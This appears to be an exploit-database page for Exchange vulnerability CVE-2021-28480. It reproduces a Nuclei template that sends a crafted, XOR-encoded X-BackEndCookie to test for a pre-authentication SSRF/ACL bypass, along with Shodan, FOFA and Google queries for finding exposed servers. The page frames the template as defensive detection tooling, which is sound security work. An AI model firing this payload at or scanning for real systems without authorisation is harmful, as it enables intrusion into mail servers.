Materialized exploit
CVE-2021-28480
CRITICAL1 public exploit(s) for this CVE, 1 materialized with their code.
For defensive research only. Only test on systems you own or have written authorization for. Unauthorized access is illegal.
Nuclei
critical Verified
Source
Microsoft Exchange - Pre-Auth SSRF / ACL Bypass (ProxyNotFound)
By projectdiscovery
How to test this exploit
The Nuclei template IS the test: an executable detection rule. Install nuclei, then run it against a target you control.
nuclei -id CVE-2021-28480 -u https://your-target
Template yaml
id: CVE-2021-28480
info:
name: Microsoft Exchange - Pre-Auth SSRF / ACL Bypass (ProxyNotFound)
author: daffainfo
severity: critical
description: |
Microsoft Exchange Server contains a remote code execution caused by improper input validation in the server component, letting remote attackers execute arbitrary code, exploit requires network access to the server.
impact: |
Attackers can execute arbitrary code remotely, potentially leading to full system compromise or data breach
remediation: |
Apply the latest security patches and updates provided by Microsoft for Exchange Server
reference:
- https://sec.vnpt.vn/2021/04/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482
- https://hitcon.org/2021/agenda/279d7810-e619-4dc3-9113-b11bad5277ec/The%20Proxy%20Era%20of%20Microsoft%20Exchange%20Server.pdf
- https://www.youtube.com/watch?v=vn4niT9XEIM
- https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2021-28480
- https://nvd.nist.gov/vuln/detail/cve-2021-28480
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-28480
cwe-id: D-CWE-noinfo
epss-score: 0.71425
epss-percentile: 0.99367
cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*
metadata:
max-request: 1
vendor: microsoft
product: exchange_server
shodan-query:
- http.favicon.hash:1768726119
- http.title:"outlook"
- cpe:"cpe:2.3:a:microsoft:exchange_server"
fofa-query:
- title="outlook"
- icon_hash=1768726119
google-query: intitle:"outlook"
tags: cve,cve2021,ssrf,rce,exchange,microsoft
variables:
email: '{{rand_base(5)}}@{{rand_base(5)}}.com'
epoch: '{{unix_time()}}'
date: '{{date_time("%Y-%M-%DT%H:%m:%s")}}'
flow: |
http(1)
let servername = template.servername;
let epoch = template.epoch;
let date = template.date;
let str = "Server~x]@" + servername.toLowerCase() + ":444/owa/?a.a#~" + epoch + "~" + date;
let result = "";
for (let i = 0; i < str.length; i++) {
let xorChar = str.charCodeAt(i) ^ 0xff;
result += xorChar.toString(16).padStart(2, "0");
}
set("rawXor", result);
http(2)
http:
- raw:
- |
GET /owa/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(to_lower(header), "x-feserver")'
condition: and
internal: true
extractors:
- type: kval
name: servername
kval:
- x_feserver
internal: true
- raw:
- |
GET /owa/calendar/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Cookie: X-BackEndCookie={{email}}={{base64(hex_decode(rawXor))}}
X-AnchorMailbox: {{email}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "NT+AUTHORITY"
- "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException"
condition: and
- type: status
status:
- 302
# digest: 4a0a004730450220715d9b791ebefebaf6736dd741a07a79d6405b31463d1d542f03b63524380cb5022100b4718507eb0906e5e9a4c062f9ab566f20901ed4834388a476791e53c2b788e2:922c64590222798bb761d5b6d8e72950